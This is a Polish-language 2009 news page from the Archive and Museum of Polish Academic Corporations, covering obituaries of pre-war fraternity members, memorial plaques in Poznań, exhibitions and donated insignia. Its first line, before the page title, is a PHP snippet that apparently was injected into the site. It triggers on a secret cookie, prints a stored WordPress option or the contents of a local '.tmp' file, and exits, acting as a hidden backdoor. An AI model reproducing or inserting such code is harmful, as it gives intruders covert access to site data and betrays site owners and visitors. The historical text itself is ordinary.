if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Aktualności 2009

Strona Archiwum i Muzeum Polskich Korporacji Akademickich - statystyki 2009

W 2009 r. stronę Archiwum odwiedzono 18.303 razy (średnio ok. 1520/miesiąc). Obejrzano 49.517 podstron (średnio ok. 4120/miesiąc).

Strona była najczęściej odwiedzona w listopadzie (2.252 wizyt), a najrzadziej w sierpniu (1.249 wizyt). W listopadzie obejrzano najwięcej podstron (5.699 wizyt), a w sierpniu najmniej (3.422 wizyt).

__________________________________________________________________________________________

Lech Działoszyński, Poznań 31 V 2008 r.

97. urodziny prof. Lecha Działoszyńskiego. Ad multos annos!

Dnia 21 grudnia 2009 r. 97. rocznicę urodzin obchodził jeden z najbardziej zasłużonych polskich korporantów prof. Lech Działoszyński, członek Korporacji Masovia oraz członek honorowy Korporacji Magna-Polonia.

Prof. Lech Działoszyński był w latach 1991-1994 pierwszym prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich. Zasłużył się dla reaktywacji szeregu poznańskich korporacji akademickich, Poznańskiego Koła Międzykorporacyjnego oraz powstania Archiwum Korporacyjnego (vide Archiwum Korporacyjne).

Czcigodnemu jubilatowi sto lat!

_________________________________________________________________________________________

W hołdzie rektorom Uniwersytetu Poznańskiego-członkom korporacji akademickich

Projekt tablicy upamiętniającej rektorów Uniwersytetu Poznańskiego-członków korporacji akademickich.

Z okazji 90. rocznicy powstania pierwszych korporacji akademickich w Poznaniu w 2010 r. odsłonięta zostanie tablica pamiątkowa poświęcona korporantom-rektorom Uniwersytetu Poznańskiego.

Tablica ma upamiętniać ośmiu wybitnych przedstawicieli środowiska akademickiego, rektorów Uniwersytetu Poznańskiego-członków korporacji akademickich z lat 1920-1939: prof. Stefana Dąbrowskiego z K! Aesculapia, prof. Stanisława Dobrzyckiego z K! Chrobria, prof. Ludwika Jaxę-Bykowskiego z K! Masovia, prof. Stanisława Kasznicę z K! Helionia, prof. Edwarda Lubicz-Niezabitowskiego z K! Demetria, prof. Antoniego Peretiatkowicza z K! Mercuria, prof. Stanisława Runge z lwowskiej K! Lutyko-Venedya oraz prof. Jana Sajdaka z K! Silesia.

Tablica ma się znaleźć w Collegium Minus, miejscu najściślej związanym z historią Uniwersytetu oraz poznańskiego ruchu korporacyjnego. Jest to nawiązanie do przedwojennej tradycji, gdyż to właśnie w westybulu Collegium Minus w latach międzywojennych wisiały herby i tablice informacyjne korporacji poznańskich. Zgody na ufundowanie tablicy udzielił w dniu 4 XII 2009 r. Rektor Uniwersytetu Jego Magnificencja prof. Bronisław Marciniak.

Tablica powstanie w ramach, realizowanego z inicjatywy Archiwum Korporacyjnego przez Stowarzyszenie Filistrów Korporacji Akademickich i ze wsparciem Poznańskiego Koła Międzykorporacyjnego, projektu “Nowe tablice korporacyjne - w 25. rocznicę odsłonięcia tablic korporacyjnych w krużgankach klasztoru oo. Dominikanów w Poznaniu” (vide Tablice pamiątkowe). Celem inicjatywy jest ufundowanie trzech tablic upamiętniających patronujących ruchowi korporacyjnemu wybitnych postaci dwudziestolecia międzywojennego. Stroną merytoryczną projektu zajmuje się Archiwum Korporacyjne, a organizacyjno-finansową Fundacja “Polskie Korporacje Akademickie”. Sukcesem zakończyły się prace nad pierwszą z zaplanowanych tablic poświęconą korporantom-powstańcom wielkopolskim, którą odsłonięto dnia 25 stycznia 2009 r. na fasadzie Księgarni św. Wojciecha przy Placu Wielkopolskim w Poznaniu (vide infra). Od kwietnia 2009 r. przygotowywany jest projekt tablicy rektorskiej.

_________________________________________________________________________________________

Apel zmarłych Filistrów 1 XI 2008 - 31 X 2009

W okresie Wszystkich Świętych oraz Dnia Zadusznego nawiedzamy cmentarze i modlimy się za zmarłych członków korporacji akademickich. Spośród żyjących jeszcze przed rokiem około sześćdziesięciu ostatnich przedwojennych korporantów odeszło dwunastu. Wśród nich byli:

prof. Witold Hensel (29 marca 1917 w Gnieźnie - 22 listopada 2008 w Warszawie) z poznańskiej K! Surma,
mec. Stanisław Śniechórski (21 czerwca 1913 w Warszawie - 26 listopada 2008 w Warszawie) z lubelskiej K! Concordia,
Jerzy Jasieński (25 maja 1913 we Władykawkazie - 7 grudnia 2008 w Warszawie) z wileńskiego Konwentu Polonia,
Jan Piotrowski (12 stycznia 1909 w Warszawie - 31 grudnia 2008 w Gdańsku) z warszawskiej K! Sparta,
mec. Witold Wołłejko (18 marca 1912 w majątku Sesiki k. Wilkomierza - 18 lutego 2009 w Warszawie) z wileńskiej K! Polesia,
prof. Jerzy Staniszkis (23 listopada 1914 w Kutnie - 17 marca 2009 w Warszawie) z warszawskiej K! Sarmatia,
Władysław Dworak (15 lipca 1916 w Kielcach - 18 marca 2009 w Londynie) z warszawskiej K! Maltania,
Konrad Łapin (26 stycznia 1915 w Moskwie - 2 maja 2009 w Sopocie) z kowieńskiej K! Lauda,
Kazimierz Musiałowski (15 listopada 1909 w Warszawie - 10 czerwca 2009 w Warszawie) z warszawskiej K! Welecja,
dr Lech Idzior (25 grudnia 1912 w Ostrowie Wlkp. - 4 lipca 2009 w Kluczborku) z poznańskiej K! Chrobria,
Wielosław Wolski (17 stycznia 1919 w Radomsku - 9 września 2009 w Warszawie) z poznańskiej K! Lechia
Stanisław Zasacki (5 stycznia 1916 w Sosnówce pow. Jampol na Ukrainie - 29 października 2009 w Końskich) z warszawskiej K! Sparta.

Requiem aeternam dona eis Domine et lux perpetua luceat eis

Większość ze zmarłych w ostatnim roku korporantów zasłużyła się dla odrodzenia po 1989 r. ruchu korporacyjnego, reaktywacji poszczególnych korporacji akademickich oraz rozwoju Archiwum Korporacyjnego (vide Podziękowania). Z dziesięcioma z nich w roku akademickim 2006/2007 udało się zarejestrować wywiady wspomnieniowe (vide Ostatni Filistrzy).

_________________________________________________________________________________________

Vivant Seniorzy!

Od lewej dr Bolesław Skrzypczak, Zygfryd Wiktor Kordus, kwatera Lechii, Poznań 3 XII 2008 r.

W końcu października dwóch niezwykle zasłużonych dla odrodzenia po 1989 r. ruchu korporacyjnego Filistrów obchodzi urodziny. Dnia 29 października 2008 r. ostatni żyjący przedwojenny Filister Korporacji Baltia, członek honorowy Magna-Polonii dr Bolesław Skrzypczak świętuje 89 urodziny. Natomiast dnia 30 października 2008 r. 98 lat kończy nestor Korporacji Magna-Polonia i całego środowiska Poznańskiego Koła Międzykorporacyjnego Zygfryd Wiktor Kordus. Filistrzy Seniorzy rozpoczynają odpowiednio 90 i 99 rok życia!

Warto wspomnieć, że Bolesław Skrzypczak był w latach 1997-2007 Prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich, a w 2002 r. jednym z głównych reaktywatorów Baltii. Z kolei Zygfryd Wiktor Kordus był Prezesem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich w latach 1994-1997, a w 2004 r. głównym reaktywatorem Magna-Polonii. Przez wiele lat obaj Filistrzy wspierali powołanie i rozwój Archiwum i Muzeum Polskich Korporacji Akademickich (vide Archiwum Korporacyjne).

Obu Drogim Filistrom najserdeczniejsze życzenia i gratulacje. Ad multos annos!

_________________________________________________________________________________________

O lwowskich korporacjach i Archiwum Korporacyjnym w “Cracovia Leopolis”

Stopka kwartalnika Cracovia Leopolis.

Miło nam zauważyć, że w numerze 3(59)/2009 kwartalnika “Cracovia Leoplis” ukazał się artykuł pt. “Lwowskie korporacje akademickie”. Autorką artykułu jest Pani Marta Walczewska, córka jednego z przedwojennych członków lwowskiej Korporacji Zagończyk.

W artykule przedstawiono zarys polskiego ruchu korporacyjnego, ze szczególnym uwzględnieniem działających w okresie międzywojennym korporacji lwowskich. Ponadto Autorka obszernie omówiła działalność naszego Archiwum, w tym także zbiór zgromadzonych przez nas pamiątek po korporacjach lwowskich. Pani Marcie Walczewskiej jesteśmy szczerze zobowiązani!

_________________________________________________________________________________________

Okładka publikacji Andrzeja Gulczyńskiego pt. Prawo na zamku.

“Uniwersytet na zamku” - wystawa z okazji 90-lecia Uniwersytetu im. Adama Mickiewicza.

Z okazji 90-lecia Uniwersytetu im. Adama Mickiewicza w dniach od 6 do 31 maja 2009 r. odbyła się zorganizowana przez dra Andrzeja Gulczyńskiego wystawa pt. “Uniwersytet na zamku”.

Przejście Senatu Uniwersytetu z zamku do Collegium Minus, Poznań lata 1936-1939.

Ekspozycja przypomina, że zbudowany w latach 1905-1910 zamek cesarski w Poznaniu pełnił w okresie międzywojennym dwie zasadnicze funkcje: był oficjalną rezydencją głowy państwa podczas pobytów w Poznaniu oraz głównym gmachem nowoutworzonego Uniwersytetu Poznańskiego.

Wystawie towarzyszyło wydanie przez jej Kuratora obszernej broszury pt. “Prawo na zamku” poświęconej historii Wydziału Prawno-Ekonomicznego w dawnej rezydencji cesarskiej.

Zarówno na wystawie, jak i w publikacji wykorzystano fotografie z Archiwum Korporacyjnego.

_________________________________________________________________________________________

+ Konrad Łapin, Laudanin (1915-2009)

Konrad Łapin, 1974 r.

Dnia 2 maja 2009 r. zmarł w wieku 95 lat Konrad Łapin z kowieńskiej Korporacji Lauda.

Konrad Łapin urodził się dnia 26 stycznia 1915 r. w Moskwie, gdzie pracowali jego rodzice. W 1922 r. rodzina osiedliła się w Kownie, stolicy państwa litewskiego. Ukończył tam polskie gimnazjum im. Adama Mickiewicza oraz polonistykę na Uniwersytecie Witolda Wielkiego. W czasie studiów w 1934. został przyjęty do K! Lauda.

W końcu 1939 r. przeniósł się do Wilna, gdzie podjął pracę i poznał swoją późniejszą żonę Halinę. W 1942 r. wraz żoną został wysiedlony przez Litwinów z Wilna do Jezioros koło Dyneburga. Po ekspatriacji w 1945 r. osiedlił się w Sopocie. Od 1956 pracował w Radiu Gdańsk, między innymi na stanowiskach kierownika Redakcji Audycji Satyrycznych i Rozrywkowych, a następnie zastępcy kierownika Redakcji Literackiej. Był autorem powieści, librett do musicali, wierszy, piosenek, kalamburów oraz fraszek (pseudonim literacki Jacek Kasprowy). W 2005 r. został uhonorowany medalem za zasługi dla Gdańska.

W 1989 r. napisał historię K! Lauda pt “Wstęga Laudy”. Z Konradem Łapinem w 2006 r. przeprowadzono wywiad w ramach akcji Ostatni Filistrzy. Zmarły Laudanin należał także do osób zasłużonych dla Archiwum Korporacyjnego (vide Podziękowania).

Requiescat in pace.

_________________________________________________________________________________________

Wystawa Życie studenckie w korporacjach akademickich wczoraj i dziś, od lewej rektor UAM prof. Bronisław Marciniak, prorektor UAM prof. Zbigniew Pilarczyk, wicemarszałek Województwa Wielkopolskiego Krystyna Poślednia, organizator wystawy Tomasz Cieślak, rektor UM prof. Jacek Wysocki, Poznań PTPN 6 V 2009 r.

Wystawa “Życie studenckie w korporacjach akademickich wczoraj i dziś” w Poznańskim Towarzystwie Przyjaciół Nauk

W dniach od 24 kwietnia 2009 r. do 30 maja 2009 r. w siedzibie Poznańskiego Towarzystwa Przyjaciół Nauk (ul. Mielżyńskiego 27) prezentowana jest, organizowana przez Korporację Akademicką Masovia, wystawa pt. “Życie studenckie w korporacjach akademickich wczoraj i dziś”. Wcześniej ekspozycja była udostępniona na Wydziale Nauk Politycznych i Dziennikarstwa (vide infra).

Na wystawę składa się ponad 20 tablic, na których prezentowane są zarówno przedwojenne, jak i współczesne fotografie o tematyce korporacyjnej. Osobą odpowiedzialną za organizację całego przedsięwzięcia jest student V roku historii i politologii Tomasz Cieślak z Korporacji Masovia. Patronat merytoryczny nad wystawą sprawuje nasze Archiwum Korporacyjne.

Serdecznie zapraszamy!

_________________________________________________________________________________________

Barwy korporacyjne śp. Zbigniewa Osuchowskiego w Archiwum Korporacyjnym

Dekiel i banda Zbigniewa Osuchowskiego z K! Rosevia.

Dnia 16 kwietnia 2009 r. w czasie miłej uroczystości w Krakowie Pan Krzysztof Osuchowski przekazał do Archiwum Korporacyjnego insygnia korporacyjne po swoim śp. Ojcu Zbigniewie Osuchowskim z K! Rosevia.

K! Rosevia należała obok m.in. Wisły, Baltii, Masovii, Laconii, Gedanii Posnaniensis, Codanii, Korabii oraz Husarii do tzw. korporacji morskich, a jej główne zadanie polegało na “krzewieniu umiłowania wybrzeża i morza polskiego oraz zrozumienia ich znaczenia dla państwa”, a także “prowadzeniu prac społeczno-kulturalnych na Kaszubach” (vide szerzej D. Pater, P. Tomaszewski, Od morza jesteśmy… Świadomość pomorska w myśli i działalności akademickiego ruchu korporacyjnego w Polsce w czasach II Rzeczypospolitej, Toruń 2006). Od 1926 r. Rosevia była skartelowana z K! Masovia.

Radość nasza jest tym większa, że jest to dopiero druga gdańska korporacja, której dekiel udało się nam pozyskać. Przekazane barwy uzupełniają dotychczasowe skromne zbiory pamiątek po K! Rosevia. Jednocześnie pozwolą przy najbliższym rozszerzeniu ekspozycji na zaprezentowanie tej korporacji w internetowym Muzeum Polskich Korporacji Akademickich.

_________________________________________________________________________________________

Identyfikacja czapki Korporacji Praetoria z Krakowa

Czapka Korporacji Praetoria z Krakowa

Pozyskana w 2008 r. przez Archiwum Korporacyjne i niezidentyfikowana dotychczas czapka korporacyjna okazała się być deklem krakowskiej Korporacji Praetoria. Czapka od kilku miesięcy prezentowana była na podstronie Archiwum poświęconej akcji identyfikacji pamiątek korporacyjnych.

Ustalenia dokonano dnia 26 III 2009 r. dzięki pomocy dra Karola Ryglewicza, syna śp. prof. Karola Ryglewicza (K! Praetoria).

Identyfikacja czapki Praetorii pozwala żywić nadzieję na ustalenie pochodzenia pozostałych zagadkowych insygniów i fotografii korporacyjnych. W tym celu zapraszamy do udziału w akcji Identyfikacja fotografii.

Powyższe ustalenia stwarzają także możliwość na prezentację w najbliższej przyszłości Korporacji Praetoria w wirtualnym Muzeum Polskich Korporacji Akademickich. Poszukiwania czapek tych korporacji akademickich, które nie doczekały się jeszcze opracowania na stronie Muzeum, trwają (vide Poszukiwania) i niekiedy przynoszą także efekt (vide infra wiadomość z dnia 24 lutego 2008 r. “Nowości na stronie Archiwum Korporacyjnego”). Za wszelką pomoc w tym względzie będziemy wdzięczni.

_________________________________________________________________________________________

Wystawa “Życie studenckie w korporacjach akademickich wczoraj i dziś”
na Wydziale Nauk Politycznych i Dziennikarstwa UAM

W dniach od 25 marca 2009 r. do 9 kwietnia 2009 r. w holu głównym siedziby Wydziału Nauk Politycznych i Dziennikarstwa Uniwersytetu im. Adama Mickiewicza w Poznaniu (ul. Umultowska 89a) prezentowana jest, organizowana przez Korporację Akademicką Masovia, wystawa pt. “Życie studenckie w korporacjach akademickich wczoraj i dziś”. Patronat honorowy nad wystawą objął Prorektor UAM prof. Zbigniew Pilarczyk, a patronat merytoryczny nasze Archiwum Korporacyjne.

Na wystawę składa się ponad 20 tablic, na których prezentowane są zarówno przedwojenne, jak i współczesne fotografie o tematyce korporacyjnej. Poza ekspozycją zdjęć prowadzone będą także dyżury i spotkania informacyjne dla studentów zainteresowanych działalnością korporacji akademickich. Osobą odpowiedzialną za organizację całego przedsięwzięcia jest student V roku historii i politologii Tomasz Cieślak z Korporacji Masovia.

Informacje o wystawie można znaleźć na stronie internetowej Masovii (www.masovia.org) oraz na witrynie WNPiD (www.inpid.amu.edu.pl). Serdecznie zapraszamy!

_________________________________________________________________________________________

+ Jerzy Staniszkis, Sarmata (1914-2009)

Prof. Jerzy Staniszkis, akcja Ostatni Filistrzy, Warszawa 18 VIII 2007 r.

Dnia 17 marca 2009 r. zmarł w Warszawie w wieku niemal 95 lat prof. Jerzy Staniszkis z warszawskiej Korporacji Sarmatia.

Jerzy Staniszkis urodził się dnia 23 listopada 1914 r. w Kutnie. Pochodził z rodziny o tradycjach inteligenckich i patriotycznych. Jego ojciec Witold Teofil Staniszkis (1880-1941) był agrotechnikiem, profesorem SGGW, działaczem ruchu narodowego i posłem na Sejm. W 1933 r. Jerzy Staniszkis ukończył Gimnazjum im. Stefana Batorego w Warszawie oraz rozpoczął studia architektury na Politechnice Warszawskiej. W 1935 r. (1933 r.?), podobnie jak kilka lat wcześniej jego starszy brat Olgierd (1910-2006), został przyjęty do Sarmatii. Uczestniczył w kampanii wrześniowej jako żołnierz 3. Pułku Szwoleżerów Mazowieckich. Został czterokrotnie odznaczony Krzyżem Walecznych. W początkach października 1939 r. dostał się do niewoli i pozostałe lata wojny spędził w obozach jenieckich w Weilburgu, Ostenrode oraz Woldenbergu. W 1945 r. powrócił do Warszawy i ukończył studia architektoniczne.

W pierwszych latach powojennych Jerzy Staniszkis pracował w Biurze Odbudowy Stolicy, Biurze Urbanistycznym Warszawy oraz Pracowniach Budownictwa Przemysłowego i w Miastoprojekcie Stolica. W tym czasie był także asystentem na Wydziale Architektury Politechniki Warszawskiej. W 1950 r. został profesorem Wyższej Szkoły Sztuk Pięknych w Poznaniu (obecnie Akademia Sztuk Pięknych). Specjalizował się w architekturze wystawienniczej. W 1960 r. wyjechał za granicę: najpierw do Iraku, później do Stanów Zjednoczonych. Pracował na Uniwersytecie Bagdadzkim, a w latach 1962-1987 był profesorem na Wydziale Architektury Uniwersytetu Detroit. W 1992 r. wrócił do Polski. Był twórcą pomnika Państwa Podziemnego w Warszawie (w 1999 r. pomnik został poświęcony przez Jana Pawła II).

Do samej śmierci pozostał związany z ruchem korporacyjnym, w szczególności z macierzystą Sarmatią. W 2007 r. został z nim zarejestrowany wywiad w ramach akcji Ostatni Filistrzy.

Requiem aeternam dona eis Domine et lux perpetua luceat eis.

_________________________________________________________________________________________

Nowości na stronie Archiwum Korporacyjnego

Dekiel Mariana Stachowiaka z K! Posnania

W dniu 24 lutego w wirtualnym Muzeum Polskich Korporacji Akademickich dodano opracowania poświęcone 16 korporacjom akademickim, które do tej pory nie były szerzej na naszych stronach przedstawione.

Omówienia doczekały się korporacje warszawskie (ARKONIA, WELECJA, MALTANIA) oraz poznańskie (POSNANIA, LEGIA, MERCURIA, SLENSANIA, LACONIA, HERMESIA, AESCULAPIA, CODANIA, ICARIA, HUSARIA, GEDANIA POSNANIENSIS, IUSTITIA, ODRA).

Karnet balowy z XXXVI Balu Arkonii, Warszawa 31 I 1929r.

Dzięki temu na stronach Muzeum znaleźć można nie tylko charakterystyki wcześniej nieprzedtawionych korporacji, ale także kolejne około trzy tysiące nazwisk polskich korporantów z lat 1879-1939. Niemal dwie trzecie z nich stanowią członkowie Arkonii i Welecji.

Wszystkim osobom, które przyczyniły się do tego powiększenia ekspozycji w Muzeum Polskich Korporacji Akademickich jesteśmy bardzo zobowiązani!

Bandy Welecji: z czasów ryskich Mariana Lutosławskiego (szersza) oraz z czasów warszawskich Olgierda Rypińskiego (węższa).

Będziemy wdzięczni za wszelkie korekty, uwagi, informacje i materiały dotyczące zarówno wyżej wymienionych korporacji, jak także innych polskich korporacji akademickich (odnośnie do stanu poszukiwań w poszczególnych ośrodkach korporacyjnych vide “Pozostałe” w Muzeum Korporacyjne). Prosimy także o nadsyłanie biogramów przedwojennych członków korporacji oraz adresów do członków ich rodzin.

W związku z problemami technicznymi i finansowymi przesunięciu ulega inauguracja anglojęzycznego serwisu Archiwum Korporacyjnego. Tym bardziej bylibyśmy zobowiązani za wszelką pomoc w tym względzie (vide Finansowanie).

_________________________________________________________________________________________

Witold Wołłejko, Wilno 9 V 1931 r.+ Witold Wołłejko, Polesiak (1912-2009)

W dniu 18 lutego 2009 r. po długiej chorobie zmarł w Warszawie mec. Witold Wołłejko, ostatni członek Korporacji Polesia z Wilna.

Witold Wołłejko urodził się w 1912 r. Studiował prawo na Uniwersytecie Stefana Batorego w Wilnie. Do Polesii został przyjęty dnia 9 maja 1931 r.

Walczył w wojnie obronnej 1939 r. jako podchorąży Pułku 4 Ułanów Zaniemeńskich, a następnie do 1944 r. w ZWZ-AK na Wileńszczyźnie. Był osadzony w obozie w Starobielsku. Po ekspatriacji do Polski w 1944 r. osiedlił się w Warszawie. Był adwokatem. W 2007 r. otrzymał Krzyż Oficerski Orderu Odrodzenia Polski.

Witold Wołłejko zasłużył się dla rozwoju Archiwum Korporacyjnego (vide Podziękowania), a w lipcu 2007 r. został z nim przeprowadzony wywiad w ramach akcji Ostatni Filistrzy.

W intencji zmarłego dnia 26 lutego 2009 r. o godz. 11.15 odprawiona zostanie Msza Św. w kościele pw. św. Józefata przy ul. Powązkowskiej w Warszawie. O godz. 12.00 odbędzie się pogrzeb na Cmentarzu Wojskowym na Powązkach.

Requiem aeternam dona eis Domine et lux perpetua luceat eis.

_________________________________________________________________________________________

Zaproszenie na wystawę

Przedłużenie wystawy “Dwudziestolecie. Oblicza nowoczesności” na Zamku Królewskim w Warszawie

Organizowana z okazji 90. rocznicy odzyskania niepodległości na Zamku Królewskim w Warszawie przez Muzeum Historii Polski pod Honorowym Patronatem Prezydenta Rzeczypospolitej Polskiej prof. Lecha Kaczyńskiego wystawa “Dwudziestolecie. Oblicza nowoczesności“ została przedłużona do dnia 1 marca 2009 r.

W ramach ekspozycji prezentowane są także materiały poświęcone korporacjom akademickim okresu międzywojnia.

Insygnia korporacyjne na wystawie

Na wystawie można zobaczyć około 30 pamiątek korporacyjnych pochodzących z naszego Archiwum Korporacyjnego.

Część “korporacyjna” wystawy

Są wśród nich dekle, szarfy, bandy, dewizki, dokumenty oraz fotografie po kilkunastu korporacjach z Wilna (Conradia, Leonidania, Piłsudia), Warszawy (Arkonia, Welecja, Sparta, Filomatia Varsoviensis), Lwowa (Slavia), Poznania (Magna-Polonia, Surma, Baltia, Silesia, Roma, Aesculapia), Krakowa (Sian, Chortycia, Emunah) oraz Lublina (Hetmania).

Serdecznie zapraszamy!

_________________________________________________________________________________________

Odsłonięcie tablicy poświęconej korporantom-powstańcom wielkopolskim

Tablica poświęcona korporantom-powstańcom wielkopolskim, Plac Wolności, Poznań.

W niedzielę 25 stycznia 2009 r. na gmachu Księgarni św. Wojciecha przy Placu Wolności w Poznaniu odsłonięto tablicę pamiątkową poświęconą korporantom-powstańcom wielkopolskim.

Wiemy, że w polskich korporacjach akademickich było wielu powstańców wielkopolskich, z pewnością ponad stu. Na tablicy wymieniono dziesięć postaci reprezentujących to grono i jednocześnie polski ruch korporacyjny. Listę powstańców otwierają dwaj dowódcy Powstania: gen. Józef Dowbor-Muśnicki oraz gen. Stanisław Taczak (obaj Lechia). Są na niej także: jeden z najwybitniejszych polskich wojskowych XX wieku gen. Władysław Anders (Arkonia), polityk i działacz społeczny, wybrany w 1938 r. prezydentem Poznania mec. dr Stanisław Celichowski (Filomatia Posnaniensis), sędzia Sądu Najwyższego Kazimierz Daszyński (Magna-Polonia), wybitny chirurg, doktor honoris causa sześciu polskich i zagranicznych uczelni wyższych prof. Wiktor Dega (Icaria), naczelnik poznańskiego magistratu Feliks Dropiński (Masovia), duszpasterz Uniwersytetu Poznańskiego oraz duchowy ojciec poznańskich korporantów ks. prałat. Józef Prądzyński (Baltia), prezydent Bydgoszczy płk. dr Bernard Śliwiński (Surma) oraz wybitny ortopeda, profesor Uniwersytetu, senator Rzeczypospolitej gen. Ireneusz Wierzejewski (Chrobria).

Odsłonięcie tablicy przez Zygfryda Kordusa z K! Magna-Polonia oraz Jakuba Pokorę z K! Masovia.

Tablicę odsłonili nestor poznańskich korporantów, syn powstańca wielkopolskiego Zygfryd Kordus (Magna-Polonia) oraz wiceprezes Poznańskiego Koła Międzykorporacyjnego Jakub Pokora (Masovia), a poświęcił ks. abp. Stanisław Gądecki. Uroczystość prowadził Prezes Fundacji “Polskie Korporacje Akademickie” Maciej Żak z K! Lechia.

Przemówienie Bartłomieja Wróblewskiego z K! Lechia.

Miejsce i data odsłonięcia tablicy były symboliczne. Na Placu Wolności 27 grudnia 1918 r. rozpoczęło się Powstanie Wielkopolskie, a 26 stycznia 1919 r. odbyła się uroczysta przysięga wojsk wielkopolskich. W wigilię tego ostatniego wydarzenia doszło do odsłonięcia tablicy. Symboliczny był także fakt, że w obu tych wydarzeniach jako siedmioletni chłopiec uczestniczył odsłaniający tablicę obecnie 97-letni Zygfryd Kordus.

Tablica powstała w ramach, realizowanego z inicjatywy Archiwum Korporacyjnego przez Stowarzyszenie Filistrów Poznańskich Korporacji Akademickich i ze wsparciem Poznańskiego Koła Międzykorporacyjnego, projektu “Nowe tablice korporacyjne - w 25. rocznicę odsłonięcia tablic korporacyjnych w krużgankach klasztoru oo. Dominikanów w Poznaniu” (vide Tablice pamiątkowe). Stroną merytoryczną projektu zajmowało się Archiwum Korporacyjne, a organizacyjno-finansową Fundacja “Polskie Korporacje Akademickie”.

 

Uroczystość odsłonięcia tablicy.

Fotografia zbiorowa po odsłonięciu tablicy.

Poświęcenie tablicy przez ks. abp. Stanisława Gądeckiego.

_________________________________________________________________________________________

Członkowie polskich korporacji akademickich w Powstaniu Wielkopolskim

Ojciec Korporacji Lechia gen. Józef Dowbor-Muśnicki, 1933 r.

Wśród członków polskich korporacji akademickich udało się ustalić nazwiska 64 powstańców wielkopolskich. Byli wśród nich dwaj dowódcy Powstania: gen. Józef Dowbor-Muśnicki (Lechia) oraz gen. Stanisław Taczak (Lechia), a także wysocy rangą oficerowie i dowódcy, a w szczególności gen. Władysław Anders (Arkonia), ks. gen. Józef Prądzyński (Baltia), gen. Kazimierz Raszewski (Posnania), płk dr Bernard Śliwiński (Surma), gen. Antoni Unrug (Legia) oraz gen. prof. Ireneusz Wierzejewski (Chrobria). Większość korporantów walczących w Powstaniu Wielkopolskim, tak jak i większość powstańców, była ludźmi bardzo młodymi i nie miała wysokiej pozycji w hierarchii wojskowej czy powstańczej.

Władysław Anders, K! Arkonia, Ryga ok. 1910 r.

Niemal wszyscy korporanci-powstańcy należeli do korporacji poznańskich, choć udało się odnaleźć także kilku powstańców w innych polskich korporacjach akademickich, a w szczególności w wileńskim Konwencie Polonia, warszawskiej (ryskiej) Arkonii oraz lwowskiej Lutyko-Venedyi. Znaczna część z grona korporantów-powstańców tworzyła po pierwszej wojnie światowej w latach 1920-1921 ruch korporacyjny w Poznaniu zakładając najstarsze korporacje poznańskie: Polonię (Magna-Polonię), Lechię, Posnanię, Surmę oraz Chrobrię.

dr Stanisław Celichowski, K! Filomatia Posnaniensis

Niektórzy przyjmowani byli do korporacji jako członkowie honorowi bądź kooptowani, w tym, oprócz powyżej wspomnianych, między innymi mec. Ludwik Begale – Posnania, mec. dr Stanisław Celichowski – Filomatia Posnaniensis, prof. Wiktor Dega – Icaria, ks. dr Bronisław Gładysz – Filomatia Posnaniensis, prof. Adam Karwowski – Corona, płk Józef Szyman –Chrobria. Wokół kilku z nich budowana była wręcz tożsamość poszczególnych korporacji. Tak było w szczególności w Lechii i Chrobrii, gdzie tytuł “Ojców Korporacji” nosili gen. Józef Dowbor-Muśnicki oraz gen. prof. Ireneusz Wierzejewski.

Stanisław Szamborski, K! Surma, Poznań pierwsza połowa lat 20-tych

Poza wspomnianymi osobistościami wśród polskich korporantów powstańcami byli: mec. Kazimierz Bartz (Chrobria), Stefan Bross (Lutyko-Venedya, Lwów), mec. Zdzisław Cerkaski (Lechia), Kazimierz Czeszewski (Lechia), sędzia Sądu Najwyższego Kazimierz Daszyński (Magna-Polonia), Edmund Drecki (Chrobria), Feliks Dropiński (Masovia), Józef Dymiński (Chrobria), Leonard Fibak (Chrobria), Jan Gibasiewicz (Chrobria), Stanisław Gibasiewicz (Chrobria), ks. dr Bronisław Gładysz (Filomatia Posnaniensis), Marian Głowacki (Chrobria), Janusz Goebel (Chrobria), Damazy Gracz (Pomerania), mec. Tomasz Hempowicz (Chrobria), prof. Stefan Jakubowski (Lutyko-Venedya, Lwów), Michał Jankiewicz (Chrobria), mjr Tadeusz Janowski (Baltia), Tadeusz Jesionowski (Chrobria), mec. Franciszek Jezierski (Lechia), Zygmunt Kittel (Lechia), Henryk Knie (Lechia), dr Alfred Kolszewski (Lechia), mec. dr Konrad Kolszewski (Lechia), Jan Kowalewicz (Chrobria), Korporanci i powstańcy w czasie uroczystości poświęcenie przez ks. biskupa Tadeusza Ettera pomnika nagrobnego gen. Józefa Dowbor-Muśnickiego, Lusowo 20 X 1984 r. mec. Stanisław Kubiak (Chrobria), płk Michał Lorkiewicz (Chrobria), Witold Łuczyński (Chrobria), Jan Marczyński (Lutyko-Venedya, Lwów), kpt Tadeusz Mejer (Konwent Polonia, Wilno), ppłk. Zdzisław Orłowski (Laconia), gen. Gustaw Paszkiewicz (Lechia), dr Bolesław Piechowski (Lechia), mec. Zygfryd Powałowski (Chrobria), Stanisław Preibisz (Lechia), Antoni Preibisz (Lechia), mec. Stanisław Radkowski (Chrobria), mec. Kazimierz Rankowski (Chrobria), dr Celestyn Rydlewski (Lechia ?), mec. Józef Scheitza (Lechia), Aleksander Schreiber (Chrobria), Tomasz Sumiński (Chrobria), dr Stanisław Szamborski (Surma), dr Tadeusz Walkowski (Surma), mjr Władysław Wawrzyniak (Posnania), mec. Marian Węclewicz (Lechia), Jan Wróblewski (Lechia), mec. Józef Wstawski (Magna-Polonia), Bolesław Wybieralski (Gedania Posnaniensis), Marian Żurawski (Chrobria).

Powyższa lista nie jest kompletna i będzie w miarę możliwości w przyszłości uzupełniana. Za wszelką pomoc w tym względzie będziemy wdzięczni.

_________________________________________________________________________________________

Identyfikacja fotografii i innych pamiątek korporacyjnych

Czapka korporacyjna (?) z Lublina (?)

W początkach 2009 r. Archiwum Korporacyjne rozpoczęło akcję, której celem jest stopniowa prezentacja na stronie Archiwum tych pamiątek korporacyjnych zebranych w latach 2001-2008, które bądź nie zostały dotychczas zidentyfikowane bądź w wystarczającym stopniu opisane, w nadziei, że będzie to możliwe dzięki osobom odwiedzającym stronę internetową Archiwum i Muzeum Polskich Korporacji Akademickich.

